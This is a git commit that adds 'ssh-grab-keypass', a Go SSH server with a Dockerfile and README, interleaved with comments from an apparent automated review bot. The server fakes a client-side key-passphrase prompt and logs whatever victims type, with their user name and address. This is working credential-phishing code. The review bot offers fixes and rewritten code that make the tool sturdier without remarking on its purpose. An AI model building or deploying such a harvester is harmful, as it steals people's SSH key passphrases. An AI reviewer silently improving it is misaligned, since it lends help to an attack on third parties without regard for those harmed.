authormaride <maride@darknebu.la>2019-02-12 14:40:46 +0100
committermaride <maride@darknebu.la>2019-02-12 14:40:46 +0100
commit34e0f86d7eea9ed9cb891d20d0de63ce7e79dc0a (patch)
treecd682c605fc4f532d5c775ec2baf966620370632
Init
-rw-r--r--Dockerfile19
-rw-r--r--README.md7
-rw-r--r--main.go50
3 files changed, 76 insertions, 0 deletions
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..cdb8930
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,19 @@
+FROM golang:1.10-alpine
+
+# Setup
+COPY main.go .
+
+# Install libs
+RUN apk add git
+RUN go get github.com/gliderlabs/ssh
+
+# Build
+RUN go build -o ssh-grab-keypass
+
+# Drop privs
+RUN adduser -u 1337 -D jail
+RUN chmod 000 /home/jail
+
+EXPOSE 2222
+
+CMD su -c ./ssh-grab-keypass jail
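Review bot: The container starts as root and only drops to `jail` through `su -c` in a shell-form `CMD`, so the privilege drop depends on the image's `su` and may leave a root-owned parent process running. A `USER jail` line followed by `CMD ["./ssh-grab-keypass"]` lets the runtime start the process unprivileged directly, assuming the built binary stays readable and executable for that user. Separately, `RUN go get github.com/gliderlabs/ssh` pulls whatever the dependency's default branch holds at build time, so the build is not reproducible and an upstream change lands in the image unreviewed. Checking out a reviewed commit (`<PINNED_COMMIT>`) or vendoring the package would address that. The final image also keeps git and the Go toolchain, which a multi-stage build would leave behind.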
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..2afed8a
--- /dev/null
+++ b/README.md
@@ -0,0 +1,7 @@
+# ssh-grab-keypass
+
+Try to grab passphrases for SSH keyfiles by simulating the pubkey-prompt by the client - on the server side.
+
+## Usage
+
+Simply run it. The executable takes no command line arguments
diff --git a/main.go b/main.go
new file mode 100644
index 0000000..b2b2ae4
--- /dev/null
+++ b/main.go
@@ -0,0 +1,50 @@
+package main
+
+import (
+    "fmt"
+    "github.com/gliderlabs/ssh"
+    "log"
+    "strings"
+)
+
+func main() {
+    ssh.Handle(handleConnection)
+    listenErr := ssh.ListenAndServe(":2222", nil)
+
+    if listenErr != nil {
+        log.Fatalln(listenErr.Error())
+    }
+}
+
+func handleConnection(s ssh.Session) {
+    // Set up buffer
+    buf := make([]byte, 1)
+
+    // Send our message
+    fmt.Fprintf(s, "Enter passphrase for key '/home/%s/.ssh/id_rsa': ", s.User())
+
+    // Read id_rsa password of our client ;)
+    var readErr error
+    strBuf := ""
+
+    for readErr == nil && !strings.Contains(strBuf, "\x0D") {
+        _, readErr = s.Read(buf)
+
+        if string(buf[0]) != "\x0D" {
+            strBuf += string(buf[0])
+        } else {
+            break
+        }
+    }
+
+    if readErr == nil {
+        // Print out pass
+        log.Printf("%s@%s: '%s'", s.User(), s.RemoteAddr().String(), strBuf)
+    } else {
+        // Read error - just log that.
+        log.Println(readErr.Error())
+    }
+
+    // And close it.
+    s.Exit(1)
+}
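Review bot: The read loop in `handleConnection` discards the byte count from `s.Read` and puts no upper bound on `strBuf`, so a client that never sends `\x0D` can grow the string without limit (each `+=` also recopies it), and after a failed or zero-byte read the stale `buf[0]` is still appended. The log call then prints `s.User()` and the collected bytes with `%s`, both client-controlled, so embedded newlines or terminal escape sequences reach the log verbatim; `%q` escapes them. The collected value is also written in clear to the process log, which anyone with access to the container's output can read. The fence shows a bounded loop that checks `n`; the 256-byte cap is a constructed example value.

```go
func handleConnection(s ssh.Session) {
    // … unchanged: one-byte buf and the prompt written to the session …

    const maxLine = 256 // constructed example limit
    line := make([]byte, 0, maxLine)
    var readErr error

    for readErr == nil && len(line) < maxLine {
        var n int
        n, readErr = s.Read(buf)
        if n == 0 {
            continue
        }
        if buf[0] == '\x0D' {
            break
        }
        line = append(line, buf[0])
    }

    if readErr == nil {
        log.Printf("%q@%s: %q", s.User(), s.RemoteAddr().String(), line)
    } else {
        // … unchanged: read error is logged …
    }
    // … unchanged: s.Exit(1) …
}
```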